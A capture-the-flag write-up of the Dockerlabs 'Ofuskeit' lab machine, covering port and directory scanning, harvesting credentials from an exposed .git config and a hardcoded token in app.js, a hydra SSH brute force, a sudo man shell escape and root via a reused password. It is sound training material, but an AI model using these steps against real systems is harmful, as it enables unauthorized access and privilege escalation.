
Dockerlabs-Ofuskeit

649 words · 4 minutes
Dockerlabs Dockerlabs Linux
Author: HYH
A technology enthusiast focused on cybersecurity, penetration testing and CTF challenges, who enjoys documenting hands-on experience, sharing tools and techniques, and committing to continuous learning and growth.

Box Info

OS     Difficulty
Linux  Medium

Nmap

[root@kali] /home/kali/ofuskeit  
❯ nmap 172.17.0.2 -sV -A -p-   

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 9.2p1 Debian 2+deb12u6 (protocol 2.0)
| ssh-hostkey: 
|   256 f4:1e:4f:80:e4:25:19:87:a5:2b:e5:fe:b3:16:5d:70 (ECDSA)
|_  256 7d:5a:d8:80:54:05:d2:2f:6f:7f:59:26:4f:6f:83:a8 (ED25519)
80/tcp   open  http    Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: Servicios de Mantenimiento Inform\xC3\xA1tico
3000/tcp open  http    Node.js Express framework
|_http-title: Error

Dirsearch

[root@kali] /home/kali/ofuskeit  
❯ dirsearch -u http://172.17.0.2      

  _|. _ _  _  _  _ _|_    v0.4.3                                                                                                                
 (_||| _) (/_(_|| (_| )                                                                                                                         
                                                                                                                                                
Extensions: php, asp, aspx, jsp, html, htm | HTTP method: GET | Threads: 25 | Wordlist size: 12289

Target: http://172.17.0.2/

[22:47:24] Scanning:                                                                                                                            
[22:47:24] 200 -   318B - /.git                                             
[22:47:31] 200 -    2KB - /index.html                                       
[22:47:31] 301 -   313B - /javascript  ->  http://172.17.0.2/javascript/    
[22:47:33] 301 -   315B - /node_modules  ->  http://172.17.0.2/node_modules/
[22:47:33] 200 -   14KB - /node_modules/                                    
[22:47:33] 200 -   26KB - /package-lock.json                                
[22:47:33] 200 -   265B - /package.json
[22:47:34] 403 -   275B - /server-status                                    
[22:47:34] 403 -   275B - /server-status/                                   
                                                                             
Task Completed                                  

Looking at the .git directory reveals a user's details:

[root@kali] /home/kali/ofuskeit  
❯ curl http://172.17.0.2/.git
[core]
    repositoryformatversion = 0
    filemode = true
    bare = false
    logallrefupdates = true
[remote "origin"]
    url = https://github.com/empresa/mi-app-segura.git
    fetch = +refs/heads/*:refs/remotes/origin/*
[user]
    name = balulito
    email = admin@empresa.com
    password = 'this is top secret'

Feroxbuster

[root@kali] /home/kali/ofuskeit  
❯ feroxbuster -u 'http://172.17.0.2/' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x js       
                                                                                                                                                
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.11.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://172.17.0.2/
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.11.0
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 💲  Extensions            │ [js]
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET        9l       31w      272c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403      GET        9l       28w      275c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET      153l      268w     2270c http://172.17.0.2/style.css
200      GET        1l       18w     1916c http://172.17.0.2/script.js
200      GET       66l      170w     2129c http://172.17.0.2/
301      GET        9l       28w      313c http://172.17.0.2/javascript => http://172.17.0.2/javascript/
200      GET       21l       58w      494c http://172.17.0.2/api.js
301      GET        9l       28w      320c http://172.17.0.2/javascript/events => http://172.17.0.2/javascript/events/
200      GET      497l     1777w    14890c http://172.17.0.2/javascript/events/events
200      GET      497l     1777w    14890c http://172.17.0.2/javascript/events/events.js
301      GET        9l       28w      318c http://172.17.0.2/javascript/util => http://172.17.0.2/javascript/util/
301      GET        9l       28w      326c http://172.17.0.2/javascript/util/support => http://172.17.0.2/javascript/util/support/
200      GET        3l       10w       76c http://172.17.0.2/javascript/util/support/isBuffer
200      GET      715l     2462w    19697c http://172.17.0.2/javascript/util/util
200      GET      715l     2462w    19697c http://172.17.0.2/javascript/util/util.js
200      GET      334l      812w     8672c http://172.17.0.2/javascript/util/support/types
301      GET        9l       28w      319c http://172.17.0.2/javascript/async => http://172.17.0.2/javascript/async/
200      GET     1058l     3007w    32659c http://172.17.0.2/javascript/async/async
200      GET     1058l     3007w    32659c http://172.17.0.2/javascript/async/async.js
[####################] - 87s  1323296/1323296 0s      found:17      errors:469615 
[####################] - 45s   220546/220546  4910/s  http://172.17.0.2/ 
[####################] - 76s   220546/220546  2917/s  http://172.17.0.2/javascript/ 
[####################] - 72s   220546/220546  3043/s  http://172.17.0.2/javascript/events/ 
[####################] - 74s   220546/220546  2984/s  http://172.17.0.2/javascript/util/ 
[####################] - 74s   220546/220546  2964/s  http://172.17.0.2/javascript/util/support/ 
[####################] - 47s   220546/220546  4711/s  http://172.17.0.2/javascript/async/   

app.js can be fetched directly:

const express = require('express');
const app = express();
const PORT = 3000;

const tokenValido = "EKL56L4K57657JÑ456J74K5Ñ6754";

app.use(express.json());

app.post('/api', (req, res) => {
  const { token } = req.body;

  if (token === tokenValido) {
    return res.send("✅ Acceso concedido. Contraseña chocolate123");
  } else {
    return res.status(401).send("❌ Token inválido.");
  }
});

app.listen(PORT, () => {
  console.log(`🚀 API activa en http://localhost:${PORT}`);
});

This yields a password: chocolate123

The username admin obtained earlier from the git directory can be used, or a brute-force attempt can be made:

[root@kali] /home/kali/ofuskeit  
❯ hydra -L /usr/share/seclists/Usernames/Names/names.txt -p chocolate123  ssh://172.17.0.2 -I -V  

[22][ssh] host: 172.17.0.2   login: admin   password: chocolate123

Own balulito

Check sudo:

admin@d62eae51981f:~$ sudo -l
Matching Defaults entries for admin on d62eae51981f:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User admin may run the following commands on d62eae51981f:
    (balulito) NOPASSWD: /usr/bin/man
admin@d62eae51981f:~$ sudo -u balulito /usr/bin/man /usr/bin/man

<skip>
!/bin/bash
balulito@d62eae51981f:/home/admin$

Root

root actually uses the same weak password: chocolate123

balulito@d62eae51981f:~$ su root
Password: 
root@d62eae51981f:/home/balulito# id
uid=0(root) gid=0(root) groups=0(root)